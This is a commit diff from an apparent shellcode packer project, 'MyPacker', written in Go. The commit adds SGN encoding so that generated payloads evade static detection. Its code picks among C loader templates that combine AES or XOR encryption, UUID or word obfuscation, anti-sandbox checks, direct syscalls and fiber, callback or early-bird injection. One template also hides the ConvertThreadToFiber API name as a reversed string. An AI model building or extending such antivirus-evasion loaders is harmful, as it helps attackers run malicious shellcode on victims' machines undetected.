解决了一些bug，增加sgn编码方式，在工具里面进行编码，增加静态规避效果

fdx-xdf · May 4, 2024 · 5fddffb · 5fddffb
1 parent 228a1a1
commit 5fddffb
Show file tree

Hide file tree

Showing 9 changed files with 147 additions and 174 deletions.
diff --git a/.idea/MyPacker.iml b/.idea/MyPacker.iml
diff --git a/Converters/Converters.go b/Converters/Converters.go
@@ -1,20 +1,60 @@
 package Converters
 
 import (
+	"MyPacker/Others"
 	"encoding/hex"
 	"fmt"
 	"io/ioutil"
+	"log"
 	"os"
+	"os/exec"
+	"path/filepath"
+	"runtime"
+	"strconv"
 	"strings"
 )
 
-func OriginalShellcode(inputFile string) []byte {
-	fileContent, err := ioutil.ReadFile(inputFile)
+func OriginalShellcode(options *Others.FlagOptions) []byte {
+	fmt.Println("[+] 正在使用 sgn 工具进行编码\n")
+	switch runtime.GOOS {
+	case "windows":
+		//windows下
+		dir, err := os.Getwd()
+		if err != nil {
+			log.Fatalf("Failed to get the current working directory: %v", err)
+		}
+		dir1 := filepath.Join(dir, "T00ls", "sgn.exe")
+		cmd := exec.Command(dir1, "-a", strconv.Itoa(options.Framework), "-i", options.InputFile, "-S")
+
+		// 运行命令并等待它完成
+		err = cmd.Run()
+		if err != nil {
+			log.Fatalf("Failed to execute command: %v", err)
+		}
+	case "darwin": // macOS 的 GOOS 标识符是 darwin
+		// macOS 系统执行的命令
+		dir, err := os.Getwd()
+		if err != nil {
+			log.Fatalf("Failed to get the current working directory: %v", err)
+		}
+		dir1 := filepath.Join(dir, "T00ls", "sgn")
+		cmd := exec.Command(dir1, "-a", strconv.Itoa(options.Framework), "-i", options.InputFile, "-S")
+
+		// 运行命令并等待它完成
+		err = cmd.Run()
+		if err != nil {
+			log.Fatalf("Failed to execute command: %v", err)
+		}
+	}
+	var file = options.InputFile + ".sgn"
+	fileContent, err := ioutil.ReadFile(file)
 	if err != nil {
 		fmt.Println("Filed to open inputFile", err)
 		os.Exit(-1)
 	}
+
 	return []byte(fileContent)
+
 }
 
 func ShellcodeToHex(shellcode string) string {

diff --git a/Loader/Template.go b/Loader/Template.go
@@ -267,7 +267,7 @@ var __c__unhook__earlyBird = `
 // 纤程加载
 var __c__unhook__fiber = `
 	
-	char convert_thread_to_fiber[] = {  'r', 'e', 'b', 'i', 'F', 'o', 'T', 'd', 'a', 'e', 'r', 'T', 't', 'r', 'e', 'v', 'n', 'o', 'C', '\0' };
+    char convert_thread_to_fiber[] = {  'r', 'e', 'b', 'i', 'F', 'o', 'T', 'd', 'a', 'e', 'r', 'h','T', 't', 'r', 'e', 'v', 'n', 'o', 'C', '\0' };
     reverseString(convert_thread_to_fiber);
     typedef LPVOID(WINAPI* pConvertThreadToFiber)(
             LPVOID lpParameter

diff --git a/Loader/generateLoader.go b/Loader/generateLoader.go
@@ -4,171 +4,98 @@ import (
 	"MyPacker/Converters"
 	"MyPacker/Others"
 	"fmt"
-	"strconv"
 	"strings"
 )
 
 func GenerateAndWriteTemplateToFile(options *Others.FlagOptions, EncryptShellcode string, key string, iv string, uuidString string, words string, datasetString string) string {
-	fmt.Println("正在为您生成模板文件: " + options.OutFile + "." + strings.ToLower(options.Language) + "\n")
+	fmt.Println("[+] 正在为您生成模板文件: " + options.OutFile + "." + strings.ToLower(options.Language) + "\n")
 	outfile := options.OutFile
 	EncryptShellcode = Converters.FormattedHexShellcode(string(EncryptShellcode))
 	switch options.Unhook {
 	case false:
-		switch strings.ToLower(strconv.Itoa(options.Framework)) {
-		case "32":
-			switch strings.ToLower(options.Language) {
-			case "c":
-				outfile = outfile + ".c"
-				switch options.Sandbox {
-				case true:
-					__c__syscall__aes = strings.ReplaceAll(__c__syscall__aes, "REPLACE_ANTI_SANDBOX", __c__sandbox)
-					__c__syscall__xor = strings.ReplaceAll(__c__syscall__xor, "REPLACE_ANTI_SANDBOX", __c__sandbox)
-				default:
-					__c__syscall__aes = strings.ReplaceAll(__c__syscall__aes, "REPLACE_ANTI_SANDBOX", "")
-					__c__syscall__xor = strings.ReplaceAll(__c__syscall__xor, "REPLACE_ANTI_SANDBOX", "")
-				}
-				switch strings.ToLower(options.Encryption) {
-				case "xor":
-					__c__syscall__xor = strings.ReplaceAll(__c__syscall__xor, "REPLACE_STSYSCALL_Framework", "#include \"sys_32.h\"")
-					switch strings.ToLower(options.Obfuscation) {
-					case "uuid":
-						__c__syscall__xor = strings.ReplaceAll(__c__syscall__xor, "REPLACR_OBFUSCATION", __c__uuid)
-						__c__syscall__xor = fmt.Sprintf(__c__syscall__xor, uuidString, key)
-						switch strings.ToLower(options.Loading) {
-						case "callback":
-							//生成模板
-							__c__syscall__xor = strings.ReplaceAll(__c__syscall__xor, "REPLACE_Loading_Technique", __c__syscall_callback)
-						case "fiber":
-							__c__syscall__xor = strings.ReplaceAll(__c__syscall__xor, "REPLACE_Loading_Technique", __c__syscall__fiber)
-						case "earlybird":
-							__c__syscall__xor = strings.ReplaceAll(__c__syscall__xor, "REPLACE_Loading_Technique", __c__syscall__earlyBird)
-						}
-					case "words":
-						__c__syscall__xor = strings.ReplaceAll(__c__syscall__xor, "REPLACR_OBFUSCATION", __c__words)
-						__c__syscall__xor = fmt.Sprintf(__c__syscall__xor, datasetString, words, key)
-						switch strings.ToLower(options.Loading) {
-						case "callback":
-							//生成模板
-							__c__syscall__xor = strings.ReplaceAll(__c__syscall__xor, "REPLACE_Loading_Technique", __c__syscall_callback)
-						case "fiber":
-							__c__syscall__xor = strings.ReplaceAll(__c__syscall__xor, "REPLACE_Loading_Technique", __c__syscall__fiber)
-						case "earlybird":
-							__c__syscall__xor = strings.ReplaceAll(__c__syscall__xor, "REPLACE_Loading_Technique", __c__syscall__earlyBird)
-						}
-						//写文件
-						Others.SaveTamplate2File(outfile, __c__syscall__xor)
+		switch strings.ToLower(options.Language) {
+		case "c":
+			outfile = outfile + ".c"
+			//判断反沙箱
+			switch options.Sandbox {
+			case true:
+				__c__syscall__aes = strings.ReplaceAll(__c__syscall__aes, "REPLACE_ANTI_SANDBOX", __c__sandbox)
+				__c__syscall__xor = strings.ReplaceAll(__c__syscall__xor, "REPLACE_ANTI_SANDBOX", __c__sandbox)
+			default:
+				__c__syscall__aes = strings.ReplaceAll(__c__syscall__aes, "REPLACE_ANTI_SANDBOX", "")
+				__c__syscall__xor = strings.ReplaceAll(__c__syscall__xor, "REPLACE_ANTI_SANDBOX", "")
+			}
+			//目标架构
+			switch options.Framework {
+			case 64:
+				__c__syscall__xor = strings.ReplaceAll(__c__syscall__xor, "REPLACE_STSYSCALL_Framework", "#include \"sys_64.h\"")
+				__c__syscall__aes = strings.ReplaceAll(__c__syscall__aes, "REPLACE_STSYSCALL_Framework", "#include \"sys_64.h\"")
+			case 32:
+				__c__syscall__xor = strings.ReplaceAll(__c__syscall__xor, "REPLACE_STSYSCALL_Framework", "#include \"sys_32.h\"")
+				__c__syscall__aes = strings.ReplaceAll(__c__syscall__aes, "REPLACE_STSYSCALL_Framework", "#include \"sys_32.h\"")
+			}
+			switch strings.ToLower(options.Encryption) {
+			case "xor":
+				switch strings.ToLower(options.Obfuscation) {
+				case "uuid":
+					__c__syscall__xor = strings.ReplaceAll(__c__syscall__xor, "REPLACR_OBFUSCATION", __c__uuid)
+					__c__syscall__xor = fmt.Sprintf(__c__syscall__xor, uuidString, key)
+					switch strings.ToLower(options.Loading) {
+					case "callback":
+						//生成模板
+						__c__syscall__xor = strings.ReplaceAll(__c__syscall__xor, "REPLACE_Loading_Technique", __c__syscall_callback)
+					case "fiber":
+						__c__syscall__xor = strings.ReplaceAll(__c__syscall__xor, "REPLACE_Loading_Technique", __c__syscall__fiber)
+					case "earlybird":
+						__c__syscall__xor = strings.ReplaceAll(__c__syscall__xor, "REPLACE_Loading_Technique", __c__syscall__earlyBird)
 					}
-				case "aes":
-					__c__syscall__aes = strings.ReplaceAll(__c__syscall__aes, "REPLACE_STSYSCALL_Framework", "#include \"sys_32.h\"")
-					switch strings.ToLower(options.Obfuscation) {
-					case "uuid":
-						__c__syscall__aes = strings.ReplaceAll(__c__syscall__aes, "REPLACR_OBFUSCATION", __c__uuid)
-						__c__syscall__aes = fmt.Sprintf(__c__syscall__aes, uuidString, key, iv)
-						switch strings.ToLower(options.Loading) {
-						case "callback":
-							//生成模板
-							__c__syscall__aes = strings.ReplaceAll(__c__syscall__aes, "REPLACE_Loading_Technique", __c__syscall_callback)
-						case "fiber":
-							__c__syscall__aes = strings.ReplaceAll(__c__syscall__aes, "REPLACE_Loading_Technique", __c__syscall__fiber)
-						case "earlybird":
-							__c__syscall__aes = strings.ReplaceAll(__c__syscall__aes, "REPLACE_Loading_Technique", __c__syscall__earlyBird)
-						}
-						//写文件
-						Others.SaveTamplate2File(outfile, __c__syscall__aes)
-					case "words":
-						__c__syscall__aes = strings.ReplaceAll(__c__syscall__aes, "REPLACR_OBFUSCATION", __c__words)
-						__c__syscall__aes = fmt.Sprintf(__c__syscall__aes, datasetString, words, key, iv)
-						switch strings.ToLower(options.Loading) {
-						case "callback":
-							//生成模板
-							__c__syscall__aes = strings.ReplaceAll(__c__syscall__aes, "REPLACE_Loading_Technique", __c__syscall_callback)
-						case "fiber":
-							__c__syscall__aes = strings.ReplaceAll(__c__syscall__aes, "REPLACE_Loading_Technique", __c__syscall__fiber)
-						case "earlybird":
-							__c__syscall__aes = strings.ReplaceAll(__c__syscall__aes, "REPLACE_Loading_Technique", __c__syscall__earlyBird)
-						}
-						//写文件
-						Others.SaveTamplate2File(outfile, __c__syscall__aes)
+					//写文件
+					Others.SaveTamplate2File(outfile, __c__syscall__xor)
+				case "words":
+					__c__syscall__xor = strings.ReplaceAll(__c__syscall__xor, "REPLACR_OBFUSCATION", __c__words)
+					__c__syscall__xor = fmt.Sprintf(__c__syscall__xor, datasetString, words, key)
+					switch strings.ToLower(options.Loading) {
+					case "callback":
+						//生成模板
+						__c__syscall__xor = strings.ReplaceAll(__c__syscall__xor, "REPLACE_Loading_Technique", __c__syscall_callback)
+					case "fiber":
+						__c__syscall__xor = strings.ReplaceAll(__c__syscall__xor, "REPLACE_Loading_Technique", __c__syscall__fiber)
+					case "earlybird":
+						__c__syscall__xor = strings.ReplaceAll(__c__syscall__xor, "REPLACE_Loading_Technique", __c__syscall__earlyBird)
 					}
+					//写文件
+					Others.SaveTamplate2File(outfile, __c__syscall__xor)
 				}
-			}
-		case "64":
-			switch strings.ToLower(options.Language) {
-			case "c":
-				outfile = outfile + ".c"
-				switch options.Sandbox {
-				case true:
-					__c__syscall__aes = strings.ReplaceAll(__c__syscall__aes, "REPLACE_ANTI_SANDBOX", __c__sandbox)
-					__c__syscall__xor = strings.ReplaceAll(__c__syscall__xor, "REPLACE_ANTI_SANDBOX", __c__sandbox)
-
-				default:
-					__c__syscall__aes = strings.ReplaceAll(__c__syscall__aes, "REPLACE_ANTI_SANDBOX", "")
-					__c__syscall__xor = strings.ReplaceAll(__c__syscall__xor, "REPLACE_ANTI_SANDBOX", __c__sandbox)
-
-				}
-				switch strings.ToLower(options.Encryption) {
-				case "xor":
-					__c__syscall__xor = strings.ReplaceAll(__c__syscall__xor, "REPLACE_STSYSCALL_Framework", "#include \"sys_64.h\"")
-					switch strings.ToLower(options.Obfuscation) {
-					case "uuid":
-						__c__syscall__xor = strings.ReplaceAll(__c__syscall__xor, "REPLACR_OBFUSCATION", __c__uuid)
-						__c__syscall__xor = fmt.Sprintf(__c__syscall__xor, uuidString, key)
-						switch strings.ToLower(options.Loading) {
-						case "callback":
-							//生成模板
-							__c__syscall__xor = strings.ReplaceAll(__c__syscall__xor, "REPLACE_Loading_Technique", __c__syscall_callback)
-						case "fiber":
-							__c__syscall__xor = strings.ReplaceAll(__c__syscall__xor, "REPLACE_Loading_Technique", __c__syscall__fiber)
-						case "earlybird":
-							__c__syscall__xor = strings.ReplaceAll(__c__syscall__xor, "REPLACE_Loading_Technique", __c__syscall__earlyBird)
-						}
-					case "words":
-						__c__syscall__xor = strings.ReplaceAll(__c__syscall__xor, "REPLACR_OBFUSCATION", __c__words)
-						__c__syscall__xor = fmt.Sprintf(__c__syscall__xor, datasetString, words, key)
-						switch strings.ToLower(options.Loading) {
-						case "callback":
-							//生成模板
-							__c__syscall__xor = strings.ReplaceAll(__c__syscall__xor, "REPLACE_Loading_Technique", __c__syscall_callback)
-						case "fiber":
-							__c__syscall__xor = strings.ReplaceAll(__c__syscall__xor, "REPLACE_Loading_Technique", __c__syscall__fiber)
-						case "earlybird":
-							__c__syscall__xor = strings.ReplaceAll(__c__syscall__xor, "REPLACE_Loading_Technique", __c__syscall__earlyBird)
-						}
-						//写文件
-						Others.SaveTamplate2File(outfile, __c__syscall__xor)
+			case "aes":
+				switch strings.ToLower(options.Obfuscation) {
+				case "uuid":
+					__c__syscall__aes = strings.ReplaceAll(__c__syscall__aes, "REPLACR_OBFUSCATION", __c__uuid)
+					__c__syscall__aes = fmt.Sprintf(__c__syscall__aes, uuidString, key, iv)
+					switch strings.ToLower(options.Loading) {
+					case "callback":
+						//生成模板
+						__c__syscall__aes = strings.ReplaceAll(__c__syscall__aes, "REPLACE_Loading_Technique", __c__syscall_callback)
+					case "fiber":
+						__c__syscall__aes = strings.ReplaceAll(__c__syscall__aes, "REPLACE_Loading_Technique", __c__syscall__fiber)
+					case "earlybird":
+						__c__syscall__aes = strings.ReplaceAll(__c__syscall__aes, "REPLACE_Loading_Technique", __c__syscall__earlyBird)
 					}
-				case "aes":
-					__c__syscall__aes = strings.ReplaceAll(__c__syscall__aes, "REPLACE_STSYSCALL_Framework", "#include \"sys_64.h\"")
-					switch strings.ToLower(options.Obfuscation) {
-					case "uuid":
-						__c__syscall__aes = strings.ReplaceAll(__c__syscall__aes, "REPLACR_OBFUSCATION", __c__uuid)
-						__c__syscall__aes = fmt.Sprintf(__c__syscall__aes, uuidString, key, iv)
-						switch strings.ToLower(options.Loading) {
-						case "callback":
-							//生成模板
-							__c__syscall__aes = strings.ReplaceAll(__c__syscall__aes, "REPLACE_Loading_Technique", __c__syscall_callback)
-						case "fiber":
-							__c__syscall__aes = strings.ReplaceAll(__c__syscall__aes, "REPLACE_Loading_Technique", __c__syscall__fiber)
-						case "earlybird":
-							__c__syscall__aes = strings.ReplaceAll(__c__syscall__aes, "REPLACE_Loading_Technique", __c__syscall__earlyBird)
-						}
-						//写文件
-						Others.SaveTamplate2File(outfile, __c__syscall__aes)
-					case "words":
-						__c__syscall__aes = strings.ReplaceAll(__c__syscall__aes, "REPLACR_OBFUSCATION", __c__words)
-						__c__syscall__aes = fmt.Sprintf(__c__syscall__aes, datasetString, words, key, iv)
-						switch strings.ToLower(options.Loading) {
-						case "callback":
-							//生成模板
-							__c__syscall__aes = strings.ReplaceAll(__c__syscall__aes, "REPLACE_Loading_Technique", __c__syscall_callback)
-						case "fiber":
-							__c__syscall__aes = strings.ReplaceAll(__c__syscall__aes, "REPLACE_Loading_Technique", __c__syscall__fiber)
-						case "earlybird":
-							__c__syscall__aes = strings.ReplaceAll(__c__syscall__aes, "REPLACE_Loading_Technique", __c__syscall__earlyBird)
-						}
-						//写文件
-						Others.SaveTamplate2File(outfile, __c__syscall__aes)
+					//写文件
+					Others.SaveTamplate2File(outfile, __c__syscall__aes)
+				case "words":
+					__c__syscall__aes = strings.ReplaceAll(__c__syscall__aes, "REPLACR_OBFUSCATION", __c__words)
+					__c__syscall__aes = fmt.Sprintf(__c__syscall__aes, datasetString, words, key, iv)
+					switch strings.ToLower(options.Loading) {
+					case "callback":
+						//生成模板
+						__c__syscall__aes = strings.ReplaceAll(__c__syscall__aes, "REPLACE_Loading_Technique", __c__syscall_callback)
+					case "fiber":
+						__c__syscall__aes = strings.ReplaceAll(__c__syscall__aes, "REPLACE_Loading_Technique", __c__syscall__fiber)
+					case "earlybird":
+						__c__syscall__aes = strings.ReplaceAll(__c__syscall__aes, "REPLACE_Loading_Technique", __c__syscall__earlyBird)
 					}
+					//写文件
+					Others.SaveTamplate2File(outfile, __c__syscall__aes)
 				}
 			}
 		}